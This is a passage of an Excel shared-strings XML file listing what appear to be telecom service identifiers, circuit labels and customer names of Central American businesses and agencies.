  <si>
    <t>F4565516</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM0438</t>
  </si>
  <si>
    <t>F4565519</t>
  </si>
  <si>
    <t>F4565520</t>
  </si>
  <si>
    <t>25252700SV</t>
  </si>
  <si>
    <t>F4565521</t>
  </si>
  <si>
    <t>F4565522</t>
  </si>
  <si>
    <t>F4565523</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_4119</t>
  </si>
  <si>
    <t>F4565528</t>
  </si>
  <si>
    <t>CONTR0001571034OC</t>
  </si>
  <si>
    <t>F4565540</t>
  </si>
  <si>
    <t>837600003T</t>
  </si>
  <si>
    <t>F4565564</t>
  </si>
  <si>
    <t>F4565571</t>
  </si>
  <si>
    <t>F4565577</t>
  </si>
  <si>
    <t>344400093T</t>
  </si>
  <si>
    <t>F4565582</t>
  </si>
  <si>
    <t>F4565585</t>
  </si>
  <si>
    <t>F4565589</t>
  </si>
  <si>
    <t>F4565590</t>
  </si>
  <si>
    <t>F4565592</t>
  </si>
  <si>
    <t>IP2037200SV</t>
  </si>
  <si>
    <t>F4565614</t>
  </si>
  <si>
    <t>F4565615</t>
  </si>
  <si>
    <t>IP2087025SV</t>
  </si>
  <si>
    <t>IP2025168SV</t>
  </si>
  <si>
    <t>F4565618</t>
  </si>
  <si>
    <t>F4565619</t>
  </si>
  <si>
    <t>F4565635</t>
  </si>
  <si>
    <t>F4565636</t>
  </si>
  <si>
    <t>F4565641</t>
  </si>
  <si>
    <t>61300011T</t>
  </si>
  <si>
    <t>IDG000323SV</t>
  </si>
  <si>
    <t>AMALIA CONCEPCION MEJIA DE RIVERA</t>
  </si>
  <si>
    <t>F4594506</t>
  </si>
  <si>
    <t>921500010T</t>
  </si>
  <si>
    <t>F4594511</t>
  </si>
  <si>
    <t>344400181T</t>
  </si>
  <si>
    <t>F4594520</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_COL_PROGRESO</t>
  </si>
  <si>
    <t>F4594526</t>
  </si>
  <si>
    <t>F4594535</t>
  </si>
  <si>
    <t>CC_BANTRAB_GT_AGENCIA_70</t>
  </si>
  <si>
    <t>F4594539</t>
  </si>
  <si>
    <t>F4594541</t>
  </si>
  <si>
    <t>318400013T</t>
  </si>
  <si>
    <t>625900073T</t>
  </si>
  <si>
    <t>CONTR0001438822OC</t>
  </si>
  <si>
    <t>F4594551</t>
  </si>
  <si>
    <t>F4594555</t>
  </si>
  <si>
    <t>F4594557</t>
  </si>
  <si>
    <t>F4594560</t>
  </si>
  <si>
    <t>1742185OH</t>
  </si>
  <si>
    <t>OH1000673071/CORPORACION CENTROAMERICA DE COMUNICACIONES VICA -</t>
  </si>
  <si>
    <t>F4594575</t>
  </si>
  <si>
    <t>61200228T</t>
  </si>
  <si>
    <t>F4594589</t>
  </si>
  <si>
    <t>90001910214T</t>
  </si>
  <si>
    <t>265900165T</t>
  </si>
  <si>
    <t>F4594614</t>
  </si>
  <si>
    <t>526800004T</t>
  </si>
  <si>
    <t>90001908835T</t>
  </si>
  <si>
    <t>F4594635</t>
  </si>
  <si>
    <t>825300026T</t>
  </si>
  <si>
    <t>248700019T</t>
  </si>
  <si>
    <t>F4547297</t>
  </si>
  <si>
    <t>F4547326</t>
  </si>
  <si>
    <t>F4547328</t>
  </si>
  <si>
    <t>F4547346</t>
  </si>
  <si>
    <t>F4547402</t>
  </si>
  <si>
    <t>F4547404</t>
  </si>
  <si>
    <t>F4547428</t>
  </si>
  <si>
    <t>F4547439</t>
  </si>
  <si>
    <t>IP2031297SV</t>
  </si>
  <si>
    <t>927747OH</t>
  </si>
  <si>
    <t>F4580585</t>
  </si>
  <si>
    <t>F4580586</t>
  </si>
  <si>
    <t>F4580593</t>
  </si>
  <si>
    <t>F4580596</t>
  </si>
  <si>
    <t>F4580603</t>
  </si>
  <si>
    <t>F4580607</t>
  </si>
  <si>
    <t>F4580608</t>
  </si>
  <si>
    <t>1738829OH</t>
  </si>
  <si>
    <t>OH1001082273</t>
  </si>
  <si>
    <t>IP2245010SV</t>
  </si>
  <si>
    <t>F4580617</t>
  </si>
  <si>
    <t>64600034T</t>
  </si>
  <si>
    <t>F4580625</t>
  </si>
  <si>
    <t>F4580629</t>
  </si>
  <si>
    <t>F4580633</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_JUANA_DE_ARCO</t>
  </si>
  <si>
    <t>F4580634</t>
  </si>
  <si>
    <t>758500237T</t>
  </si>
  <si>
    <t>MP261907025SSV</t>
  </si>
  <si>
    <t>F4580648</t>
  </si>
  <si>
    <t>F4580658</t>
  </si>
  <si>
    <t>292900165T</t>
  </si>
  <si>
    <t>F4580663</t>
  </si>
  <si>
    <t>917300002T</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_DISTRITO_SANTA_LUCIA</t>
  </si>
  <si>
    <t>1259104OH</t>
  </si>
  <si>
    <t>90001909189T</t>
  </si>
  <si>
    <t>F4580688</t>
  </si>
  <si>
    <t>F4580691</t>
  </si>
  <si>
    <t>863400208T</t>
  </si>
  <si>
    <t>F4580707</t>
  </si>
  <si>
    <t>F4580716</t>
  </si>
  <si>
    <t>F4601186</t>
  </si>
  <si>
    <t>F4601189</t>
  </si>
  <si>
    <t>F4601190</t>
  </si>
  <si>
    <t>F4601192</t>
  </si>
  <si>
    <t>25249300SV</t>
  </si>
  <si>
    <t>F4601203</t>
  </si>
  <si>
    <t>F4601206</t>
  </si>
  <si>
    <t>F4601208</t>
  </si>
  <si>
    <t>F4601209</t>
  </si>
  <si>
    <t>F4601212</t>
  </si>
  <si>
    <t>47504253T</t>
  </si>
  <si>
    <t>F4601214</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM5049</t>
  </si>
  <si>
    <t>F4601215</t>
  </si>
  <si>
    <t>F4601222</t>
  </si>
  <si>
    <t>F4601227</t>
  </si>
  <si>
    <t>F4601229</t>
  </si>
  <si>
    <t>F4601231</t>
  </si>
  <si>
    <t>F4601234</t>
  </si>
  <si>
    <t>F4601236</t>
  </si>
  <si>
    <t>F4601252</t>
  </si>
  <si>
    <t>F4601255</t>
  </si>
  <si>
    <t>F4601257</t>
  </si>
  <si>
    <t>F4601281</t>
  </si>
  <si>
    <t>8901147T</t>
  </si>
  <si>
    <t>F4601289</t>
  </si>
  <si>
    <t>889510OH</t>
  </si>
  <si>
    <t>OH1000684020/BANCO FICOHSA -</t>
  </si>
  <si>
    <t>26843700SV</t>
  </si>
  <si>
    <t>F4601300</t>
  </si>
  <si>
    <t>ID1029483SV</t>
  </si>
  <si>
    <t>INNOVA CENTER S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4601302</t>
  </si>
  <si>
    <t>F4601303</t>
  </si>
  <si>
    <t>F4601304</t>
  </si>
  <si>
    <t>F4601305</t>
  </si>
  <si>
    <t>F4601309</t>
  </si>
  <si>
    <t>617800042T</t>
  </si>
  <si>
    <t>F4601315</t>
  </si>
  <si>
    <t>669856OH</t>
  </si>
  <si>
    <t>F4550183</t>
  </si>
  <si>
    <t>CC_DISTELSA_GT_3G_LA_FELICIDAD_COATEPEQUE</t>
  </si>
  <si>
    <t>F4550184</t>
  </si>
  <si>
    <t>597800002T</t>
  </si>
  <si>
    <t>DESTECO S.A.</t>
  </si>
  <si>
    <t>F4550186</t>
  </si>
  <si>
    <t>IP2024353SV</t>
  </si>
  <si>
    <t>F4550202</t>
  </si>
  <si>
    <t>F4550204</t>
  </si>
  <si>
    <t>F4550205</t>
  </si>
  <si>
    <t>F4550220</t>
  </si>
  <si>
    <t>F4550226</t>
  </si>
  <si>
    <t>F4550231</t>
  </si>
  <si>
    <t>F4550233</t>
  </si>
  <si>
    <t>354500019T</t>
  </si>
  <si>
    <t>F4550247</t>
  </si>
  <si>
    <t>F4550248</t>
  </si>
  <si>
    <t>F4550250</t>
  </si>
  <si>
    <t>F4550258</t>
  </si>
  <si>
    <t>422800003T</t>
  </si>
  <si>
    <t>CENTURION SECURITY S.A.</t>
  </si>
  <si>
    <t>F4550270</t>
  </si>
  <si>
    <t>F4550276</t>
  </si>
  <si>
    <t>F4550278</t>
  </si>
  <si>
    <t>F4550283</t>
  </si>
  <si>
    <t>F4550288</t>
  </si>
  <si>
    <t>F4550299</t>
  </si>
  <si>
    <t>F4550307</t>
  </si>
  <si>
    <t>361400009T</t>
  </si>
  <si>
    <t>SIKA GUATEMALA S.A.</t>
  </si>
  <si>
    <t>F4550314</t>
  </si>
  <si>
    <t>CC_WALMART_SV_DDJ_SONSONATE</t>
  </si>
  <si>
    <t>F4550316</t>
  </si>
  <si>
    <t>1659878OH</t>
  </si>
  <si>
    <t>F4550325</t>
  </si>
  <si>
    <t>90001910562T</t>
  </si>
  <si>
    <t>F4550336</t>
  </si>
  <si>
    <t>F4588168</t>
  </si>
  <si>
    <t>F4588169</t>
  </si>
  <si>
    <t>F4588189</t>
  </si>
  <si>
    <t>F4588203</t>
  </si>
  <si>
    <t>F4588218</t>
  </si>
  <si>
    <t>F4588223</t>
  </si>
  <si>
    <t>F4588228</t>
  </si>
  <si>
    <t>F4588229</t>
  </si>
  <si>
    <t>F4588239</t>
  </si>
  <si>
    <t>F4588247</t>
  </si>
  <si>
    <t>F4588267</t>
  </si>
  <si>
    <t>F4588270</t>
  </si>
  <si>
    <t>F4588279</t>
  </si>
  <si>
    <t>F4588280</t>
  </si>
  <si>
    <t>F4588304</t>
  </si>
  <si>
    <t>F4615206</t>
  </si>
  <si>
    <t>F4615211</t>
  </si>
  <si>
    <t>F4615220</t>
  </si>
  <si>
    <t>F4615221</t>
  </si>
  <si>
    <t>863400054T</t>
  </si>
  <si>
    <t>ID1131003SV</t>
  </si>
  <si>
    <t>RAFAEL EDGARDO,RIVERA CEREGHINO</t>
  </si>
  <si>
    <t>F4615247</t>
  </si>
  <si>
    <t>38300612T</t>
  </si>
  <si>
    <t>625900178T</t>
  </si>
  <si>
    <t>4656831ON</t>
  </si>
  <si>
    <t>ID1036069SV</t>
  </si>
  <si>
    <t>ALL BUSINESS LOGISTICS SUPPORT SA DE CV</t>
  </si>
  <si>
    <t>90001905506T</t>
  </si>
  <si>
    <t>F4615271</t>
  </si>
  <si>
    <t>F4615272</t>
  </si>
  <si>
    <t>426500001T</t>
  </si>
  <si>
    <t>USAID / GUATEMALA</t>
  </si>
  <si>
    <t>F4615280</t>
  </si>
  <si>
    <t>ID1145144SV</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_ESTACA_PATZICIA</t>
  </si>
  <si>
    <t>F4615293</t>
  </si>
  <si>
    <t>F4615294</t>
  </si>
  <si>
    <t>F4615306</t>
  </si>
  <si>
    <t>467700001T</t>
  </si>
  <si>
    <t>313000001T</t>
  </si>
  <si>
    <t>CENTRAL DE CREDITOS S.A.</t>
  </si>
  <si>
    <t>F4530234</t>
  </si>
  <si>
    <t>F4550635</t>
  </si>
  <si>
    <t>8600078T</t>
  </si>
  <si>
    <t>F4550674</t>
  </si>
  <si>
    <t>F4550691</t>
  </si>
  <si>
    <t>F4550692</t>
  </si>
  <si>
    <t>F4550693</t>
  </si>
  <si>
    <t>F4550707</t>
  </si>
  <si>
    <t>767000013T</t>
  </si>
  <si>
    <t>940100004T</t>
  </si>
  <si>
    <t>910400108T</t>
  </si>
  <si>
    <t>F4550746</t>
  </si>
  <si>
    <t>25654400SV</t>
  </si>
  <si>
    <t>AUTORIDAD DE AVIACION CIVIL</t>
  </si>
  <si>
    <t>F4550748</t>
  </si>
  <si>
    <t>IP2374004SV</t>
  </si>
  <si>
    <t>CAJA  DE CREDITO  DE  JUCUAPA</t>
  </si>
  <si>
    <t>F4550753</t>
  </si>
  <si>
    <t>F4550755</t>
  </si>
  <si>
    <t>F4550756</t>
  </si>
  <si>
    <t>F4550757</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_3126</t>
  </si>
  <si>
    <t>512300002T</t>
  </si>
  <si>
    <t>REVILETE S.A.</t>
  </si>
  <si>
    <t>1229682OH</t>
  </si>
  <si>
    <t>F4550763</t>
  </si>
  <si>
    <t>F4550767</t>
  </si>
  <si>
    <t>F4550768</t>
  </si>
  <si>
    <t>F4566599</t>
  </si>
  <si>
    <t>8901169T</t>
  </si>
  <si>
    <t>F4566610</t>
  </si>
  <si>
    <t>ID1106047SV</t>
  </si>
  <si>
    <t>344800010T</t>
  </si>
  <si>
    <t>F4566627</t>
  </si>
  <si>
    <t>IP2127004SV</t>
  </si>
  <si>
    <t>F4566639</t>
  </si>
  <si>
    <t>F4566640</t>
  </si>
  <si>
    <t>F4566643</t>
  </si>
  <si>
    <t>F4566651</t>
  </si>
  <si>
    <t>22338000SV</t>
  </si>
  <si>
    <t>LA CASA DEL REPUESTO S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4566662</t>
  </si>
  <si>
    <t>451653ON</t>
  </si>
  <si>
    <t>F4566695</t>
  </si>
  <si>
    <t>F4566714</t>
  </si>
  <si>
    <t>F4566718</t>
  </si>
  <si>
    <t>F4566729</t>
  </si>
  <si>
    <t>F4566736</t>
  </si>
  <si>
    <t>ID1025004SV</t>
  </si>
  <si>
    <t>PICACHOS.A. DE C.V.</t>
  </si>
  <si>
    <t>F4566746</t>
  </si>
  <si>
    <t>IDG000224SV</t>
  </si>
  <si>
    <t>F4594963</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_INTERNET_C662</t>
  </si>
  <si>
    <t>F4595015</t>
  </si>
  <si>
    <t>F4595051</t>
  </si>
  <si>
    <t>F4595052</t>
  </si>
  <si>
    <t>727100023T</t>
  </si>
  <si>
    <t>F4557415</t>
  </si>
  <si>
    <t>F4557416</t>
  </si>
  <si>
    <t>F4557417</t>
  </si>
  <si>
    <t>F4557418</t>
  </si>
  <si>
    <t>854900001T</t>
  </si>
  <si>
    <t>UNIDAD DE CONTROL Y SUPERVISION DE CABLE</t>
  </si>
  <si>
    <t>8900807T</t>
  </si>
  <si>
    <t>F4557423</t>
  </si>
  <si>
    <t>1118220OH</t>
  </si>
  <si>
    <t>F4557432</t>
  </si>
  <si>
    <t>F4557444</t>
  </si>
  <si>
    <t>F4557446</t>
  </si>
  <si>
    <t>921500034T</t>
  </si>
  <si>
    <t>F4557449</t>
  </si>
  <si>
    <t>CC_BANTRAB_GT_AGENCIA_187</t>
  </si>
  <si>
    <t>F4557450</t>
  </si>
  <si>
    <t>90001905334T</t>
  </si>
  <si>
    <t>265900274T</t>
  </si>
  <si>
    <t>IP2025142SV</t>
  </si>
  <si>
    <t>PROCESOS LACTEOS S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4557462</t>
  </si>
  <si>
    <t>CC_BANTRAB_GT_AGENCIA_151</t>
  </si>
  <si>
    <t>7800514T</t>
  </si>
  <si>
    <t>F4557480</t>
  </si>
  <si>
    <t>8900358T</t>
  </si>
  <si>
    <t>F4557484</t>
  </si>
  <si>
    <t>F4557491</t>
  </si>
  <si>
    <t>F4557492</t>
  </si>
  <si>
    <t>F4557495</t>
  </si>
  <si>
    <t>39300007T</t>
  </si>
  <si>
    <t>F4557506</t>
  </si>
  <si>
    <t>39300030T</t>
  </si>
  <si>
    <t>F4557515</t>
  </si>
  <si>
    <t>F4557516</t>
  </si>
  <si>
    <t>F4557518</t>
  </si>
  <si>
    <t>F4557521</t>
  </si>
  <si>
    <t>F4557530</t>
  </si>
  <si>
    <t>F4557532</t>
  </si>
  <si>
    <t>7800404T</t>
  </si>
  <si>
    <t>940300001T</t>
  </si>
  <si>
    <t>M.D.T. INTERNACIONAL, S.A.</t>
  </si>
  <si>
    <t>F4557546</t>
  </si>
  <si>
    <t>F4557551</t>
  </si>
  <si>
    <t>IP2112086SV</t>
  </si>
  <si>
    <t>F4582189</t>
  </si>
  <si>
    <t>F4582190</t>
  </si>
  <si>
    <t>F4582204</t>
  </si>
  <si>
    <t>F4582206</t>
  </si>
  <si>
    <t>F4582217</t>
  </si>
  <si>
    <t>F4582219</t>
  </si>
  <si>
    <t>F4582224</t>
  </si>
  <si>
    <t>F4582225</t>
  </si>
  <si>
    <t>F4582227</t>
  </si>
  <si>
    <t>F4582230</t>
  </si>
  <si>
    <t>F4582242</t>
  </si>
  <si>
    <t>F4582247</t>
  </si>
  <si>
    <t>F4582248</t>
  </si>
  <si>
    <t>F4582257</t>
  </si>
  <si>
    <t>F4582258</t>
  </si>
  <si>
    <t>47502388T</t>
  </si>
  <si>
    <t>F4582261</t>
  </si>
  <si>
    <t>F4582262</t>
  </si>
  <si>
    <t>F4582264</t>
  </si>
  <si>
    <t>F4582266</t>
  </si>
  <si>
    <t>1678069OH</t>
  </si>
  <si>
    <t>F4582291</t>
  </si>
  <si>
    <t>517000001T</t>
  </si>
  <si>
    <t>GRUPO HOTELERO S.A.</t>
  </si>
  <si>
    <t>F4582296</t>
  </si>
  <si>
    <t>F4582316</t>
  </si>
  <si>
    <t>MP230107027SSV</t>
  </si>
  <si>
    <t>F4582324</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_SAN_ANTONIO_SACATEPEQUEZ</t>
  </si>
  <si>
    <t>1634996OH</t>
  </si>
  <si>
    <t>OH1001049385</t>
  </si>
  <si>
    <t>F4601324</t>
  </si>
  <si>
    <t>47504288T</t>
  </si>
  <si>
    <t>1633315OH</t>
  </si>
  <si>
    <t>F4601332</t>
  </si>
  <si>
    <t>ID1276020SV</t>
  </si>
  <si>
    <t>ATILISA S.A. DE C.V.</t>
  </si>
  <si>
    <t>C-0114102401XT</t>
  </si>
  <si>
    <t>F4601338</t>
  </si>
  <si>
    <t>F4601339</t>
  </si>
  <si>
    <t>F4601340</t>
  </si>
  <si>
    <t>F4601341</t>
  </si>
  <si>
    <t>F4601343</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM3643</t>
  </si>
  <si>
    <t>F4601354</t>
  </si>
  <si>
    <t>F4601358</t>
  </si>
  <si>
    <t>24297000SV</t>
  </si>
  <si>
    <t>23891900SV</t>
  </si>
  <si>
    <t>ALCALDIA MUNICIPAL DE TEJUTEPEQUE</t>
  </si>
  <si>
    <t>F4601376</t>
  </si>
  <si>
    <t>CONTR0001390645OC</t>
  </si>
  <si>
    <t>F4601391</t>
  </si>
  <si>
    <t>IP2383057SV</t>
  </si>
  <si>
    <t>1128524OH</t>
  </si>
  <si>
    <t>28904200SV</t>
  </si>
  <si>
    <t>IP2383058SV</t>
  </si>
  <si>
    <t>860500001T</t>
  </si>
  <si>
    <t>JOF. SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>F4601419</t>
  </si>
  <si>
    <t>450591ON</t>
  </si>
  <si>
    <t>28904600SV</t>
  </si>
  <si>
    <t>F4601426</t>
  </si>
  <si>
    <t>26608900SV</t>
  </si>
  <si>
    <t>CORVERA S.A. DE C.V.</t>
  </si>
  <si>
    <t>ID1104005SV</t>
  </si>
  <si>
    <t>VILLALOBOS, S.A DE C.V.</t>
  </si>
  <si>
    <t>F4601438</t>
  </si>
  <si>
    <t>F4601439</t>
  </si>
  <si>
    <t>F4601442</t>
  </si>
  <si>
    <t>CC_WALMART_UTILITARIOS_GT_TIENDA_0046</t>
  </si>
  <si>
    <t>F4601443</t>
  </si>
  <si>
    <t>F4601449</t>
  </si>
  <si>
    <t>25293700SV</t>
  </si>
  <si>
    <t>8901448T</t>
  </si>
  <si>
    <t>62900039T</t>
  </si>
  <si>
    <t>F4554784</t>
  </si>
  <si>
    <t>F4554785</t>
  </si>
  <si>
    <t>829100004T</t>
  </si>
  <si>
    <t>IP2112120SV</t>
  </si>
  <si>
    <t>IP2112119SV</t>
  </si>
  <si>
    <t>344400138T</t>
  </si>
  <si>
    <t>F4554822</t>
  </si>
  <si>
    <t>F4554831</t>
  </si>
  <si>
    <t>F4554840</t>
  </si>
  <si>
    <t>F4597743</t>
  </si>
  <si>
    <t>IP2285001SV</t>
  </si>
  <si>
    <t>F4597745</t>
  </si>
  <si>
    <t>F4597749</t>
  </si>
  <si>
    <t>F4597750</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_INTERNET_C152</t>
  </si>
  <si>
    <t>F4597766</t>
  </si>
  <si>
    <t>F4597775</t>
  </si>
  <si>
    <t>297400031T</t>
  </si>
  <si>
    <t>ID1276038SV</t>
  </si>
  <si>
    <t>UNINET S.A. DE C.V</t>
  </si>
  <si>
    <t>F4615513</t>
  </si>
  <si>
    <t>662600001T</t>
  </si>
  <si>
    <t>CASCADA, S.A.</t>
  </si>
  <si>
    <t>535200060T</t>
  </si>
  <si>
    <t>887500038T</t>
  </si>
  <si>
    <t>941579OC</t>
  </si>
  <si>
    <t>ELECTROMOTORES DE COSTA RICA</t>
  </si>
  <si>
    <t>F4615528</t>
  </si>
  <si>
    <t>F4615536</t>
  </si>
  <si>
    <t>F4615537</t>
  </si>
  <si>
    <t>341500017T</t>
  </si>
  <si>
    <t>OMNILIFE DE GUATEMALA S.A.</t>
  </si>
  <si>
    <t>F4615566</t>
  </si>
  <si>
    <t>F4615578</t>
  </si>
  <si>
    <t>90001911178T</t>
  </si>
  <si>
    <t>7801072T</t>
  </si>
  <si>
    <t>90001801314T</t>
  </si>
  <si>
    <t>90001801588T</t>
  </si>
  <si>
    <t>38300570T</t>
  </si>
  <si>
    <t>F4615620</t>
  </si>
  <si>
    <t>625900039T</t>
  </si>
  <si>
    <t>F4615623</t>
  </si>
  <si>
    <t>F4615626</t>
  </si>
  <si>
    <t>38300352T</t>
  </si>
  <si>
    <t>F4615652</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_ESTACA_VILLA_HERMOSA</t>
  </si>
  <si>
    <t>315800002T</t>
  </si>
  <si>
    <t>F4532354</t>
  </si>
  <si>
    <t>90001909387T</t>
  </si>
  <si>
    <t>F4550800</t>
  </si>
  <si>
    <t>F4550805</t>
  </si>
  <si>
    <t>F4550816</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM3595</t>
  </si>
  <si>
    <t>841700003T</t>
  </si>
  <si>
    <t>DISGUA DISTRI23BUIDORA GUATEMALTECA, S.A.</t>
  </si>
  <si>
    <t>361700032T</t>
  </si>
  <si>
    <t>F4550842</t>
  </si>
  <si>
    <t>IP2042036SV</t>
  </si>
  <si>
    <t>F4550845</t>
  </si>
  <si>
    <t>F4550862</t>
  </si>
  <si>
    <t>25247900SV</t>
  </si>
  <si>
    <t>F4550863</t>
  </si>
  <si>
    <t>F4550876</t>
  </si>
  <si>
    <t>949000001T</t>
  </si>
  <si>
    <t>CORPORACION ACERERA CENTROAMERICANA,S.A.</t>
  </si>
  <si>
    <t>F4550886</t>
  </si>
  <si>
    <t>F4550897</t>
  </si>
  <si>
    <t>F4550906</t>
  </si>
  <si>
    <t>F4550913</t>
  </si>
  <si>
    <t>F4550922</t>
  </si>
  <si>
    <t>F4550932</t>
  </si>
  <si>
    <t>F4567989</t>
  </si>
  <si>
    <t>F4567993</t>
  </si>
  <si>
    <t>427100125T</t>
  </si>
  <si>
    <t>CC_WALMART_GT_INTERNET_Z13</t>
  </si>
  <si>
    <t>F4568008</t>
  </si>
  <si>
    <t>F4568010</t>
  </si>
  <si>
    <t>ID1204066SV</t>
  </si>
  <si>
    <t>COPPER GROUP SA DE CV</t>
  </si>
  <si>
    <t>F4568015</t>
  </si>
  <si>
    <t>F4568017</t>
  </si>
  <si>
    <t>F4568019</t>
  </si>
  <si>
    <t>924600004T</t>
  </si>
  <si>
    <t>90001906905T</t>
  </si>
  <si>
    <t>F4568024</t>
  </si>
  <si>
    <t>F4568026</t>
  </si>
  <si>
    <t>F4568029</t>
  </si>
  <si>
    <t>88600031T</t>
  </si>
  <si>
    <t>852900003T</t>
  </si>
  <si>
    <t>INTERAMERICAN CONSULTING, S.A.</t>
  </si>
  <si>
    <t>F4568064</t>
  </si>
  <si>
    <t>F4568065</t>
  </si>
  <si>
    <t>F4568070</t>
  </si>
  <si>
    <t>F4568072</t>
  </si>
  <si>
    <t>425500039T</t>
  </si>
  <si>
    <t>F4568083</t>
  </si>
  <si>
    <t>1309021OH</t>
  </si>
  <si>
    <t>62300132T</t>
  </si>
  <si>
    <t>1309032OH</t>
  </si>
  <si>
    <t>F4568089</t>
  </si>
  <si>
    <t>1296573OH</t>
  </si>
  <si>
    <t>F4568102</t>
  </si>
  <si>
    <t>61200139T</t>
  </si>
  <si>
    <t>ID1204031SV</t>
  </si>
  <si>
    <t>F4568120</t>
  </si>
  <si>
    <t>F4568129</t>
  </si>
  <si>
    <t>F4595292</t>
  </si>
  <si>
    <t>F4595293</t>
  </si>
  <si>
    <t>F4595294</t>
  </si>
  <si>
    <t>F4595295</t>
  </si>
  <si>
    <t>F4595298</t>
  </si>
  <si>
    <t>26224900SV</t>
  </si>
  <si>
    <t>ALCALDIA MUNICIPAL DE SANTA MARIA</t>
  </si>
  <si>
    <t>F4595302</t>
  </si>
  <si>
    <t>F4595308</t>
  </si>
  <si>
    <t>F4595309</t>
  </si>
  <si>
    <t>ID1142042SV</t>
  </si>
  <si>
    <t>ZELAYA GIRON S.A. DE C.V.</t>
  </si>
  <si>
    <t>25945700SV</t>
  </si>
  <si>
    <t>HOSP.NAC.GRAL.DE NEUM.Y MED.FAM.DR.JOSE A.SALDA A</t>
  </si>
  <si>
    <t>CC_BANCO_AGRICOLA_SV_AGENCIA_ILOBASCO</t>
  </si>
  <si>
    <t>F4595335</t>
  </si>
  <si>
    <t>F4595343</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_SANTIAGO_ATITLAN</t>
  </si>
  <si>
    <t>F4595352</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM5041</t>
  </si>
  <si>
    <t>IP2141037SV</t>
  </si>
  <si>
    <t>868000003T</t>
  </si>
  <si>
    <t>F4595363</t>
  </si>
  <si>
    <t>22319300SV</t>
  </si>
  <si>
    <t>PROCURADURIA GENERAL DE LA REPUBLICA</t>
  </si>
  <si>
    <t>F4595367</t>
  </si>
  <si>
    <t>669864OH</t>
  </si>
  <si>
    <t>OH1000609422</t>
  </si>
  <si>
    <t>ID1025126SV</t>
  </si>
  <si>
    <t>FERREHOGAR SA DE CV</t>
  </si>
  <si>
    <t>F4595410</t>
  </si>
  <si>
    <t>F4595411</t>
  </si>
  <si>
    <t>F4595418</t>
  </si>
  <si>
    <t>F4595429</t>
  </si>
  <si>
    <t>885200003T</t>
  </si>
  <si>
    <t>F4595438</t>
  </si>
  <si>
    <t>F4558531</t>
  </si>
  <si>
    <t>F4558536</t>
  </si>
  <si>
    <t>F4558540</t>
  </si>
  <si>
    <t>F4558554</t>
  </si>
  <si>
    <t>F4558557</t>
  </si>
  <si>
    <t>1555853OH</t>
  </si>
  <si>
    <t>F4558561</t>
  </si>
  <si>
    <t>70200OH</t>
  </si>
  <si>
    <t>F4558589</t>
  </si>
  <si>
    <t>F4558592</t>
  </si>
  <si>
    <t>F4558596</t>
  </si>
  <si>
    <t>F4558602</t>
  </si>
  <si>
    <t>F4558610</t>
  </si>
  <si>
    <t>90001908657T</t>
  </si>
  <si>
    <t>F4558614</t>
  </si>
  <si>
    <t>F4558620</t>
  </si>
  <si>
    <t>732100006T</t>
  </si>
  <si>
    <t>F4558624</t>
  </si>
  <si>
    <t>901300002T</t>
  </si>
  <si>
    <t>DELIVERY HERO DMART GUATEMALA S.A.</t>
  </si>
  <si>
    <t>947900001T</t>
  </si>
  <si>
    <t>DIRECCION DE TECNOLOGIAS DE LA INFORMACION.</t>
  </si>
  <si>
    <t>F4558633</t>
  </si>
  <si>
    <t>F4558634</t>
  </si>
  <si>
    <t>F4558636</t>
  </si>
  <si>
    <t>CC_GYT_GT_INTERNET_AGENCIA_219</t>
  </si>
  <si>
    <t>F4558655</t>
  </si>
  <si>
    <t>F4558656</t>
  </si>
  <si>
    <t>1641304OH</t>
  </si>
  <si>
    <t>F4558663</t>
  </si>
  <si>
    <t>F4558664</t>
  </si>
  <si>
    <t>47504222T</t>
  </si>
  <si>
    <t>F4558673</t>
  </si>
  <si>
    <t>869200003T</t>
  </si>
  <si>
    <t>LABORATORIOS QUIMICO FARMACEUTICOS LANCASCO, S.A.</t>
  </si>
  <si>
    <t>F4584579</t>
  </si>
  <si>
    <t>829600009T</t>
  </si>
  <si>
    <t>F4584582</t>
  </si>
  <si>
    <t>F4584588</t>
  </si>
  <si>
    <t>F4584589</t>
  </si>
  <si>
    <t>F4584594</t>
  </si>
  <si>
    <t>F4584596</t>
  </si>
  <si>
    <t>CC_FUNDGENESIS_GT_HUHEHUETENANGO_048</t>
  </si>
  <si>
    <t>F4584611</t>
  </si>
  <si>
    <t>638300003T</t>
  </si>
  <si>
    <t>AGENCIA DE ADUANAS BENEDICTO RECINOS</t>
  </si>
  <si>
    <t>90001908820T</t>
  </si>
  <si>
    <t>F4584624</t>
  </si>
  <si>
    <t>F4584625</t>
  </si>
  <si>
    <t>F4584626</t>
  </si>
  <si>
    <t>F4584635</t>
  </si>
  <si>
    <t>939100001T</t>
  </si>
  <si>
    <t>REPRESENTACIONES ROFEC, SOCIEDAD ANONIMA.</t>
  </si>
  <si>
    <t>IP2170018SV</t>
  </si>
  <si>
    <t>758500115T</t>
  </si>
  <si>
    <t>F4584665</t>
  </si>
  <si>
    <t>863400146T</t>
  </si>
  <si>
    <t>F4584668</t>
  </si>
  <si>
    <t>F4584670</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_ETERNA_PRIMAVERA</t>
  </si>
  <si>
    <t>F4584672</t>
  </si>
  <si>
    <t>F4584675</t>
  </si>
  <si>
    <t>F4584685</t>
  </si>
  <si>
    <t>758500028T</t>
  </si>
  <si>
    <t>F4584690</t>
  </si>
  <si>
    <t>F4584693</t>
  </si>
  <si>
    <t>910400130T</t>
  </si>
  <si>
    <t>F4584698</t>
  </si>
  <si>
    <t>F4584700</t>
  </si>
  <si>
    <t>F4584702</t>
  </si>
  <si>
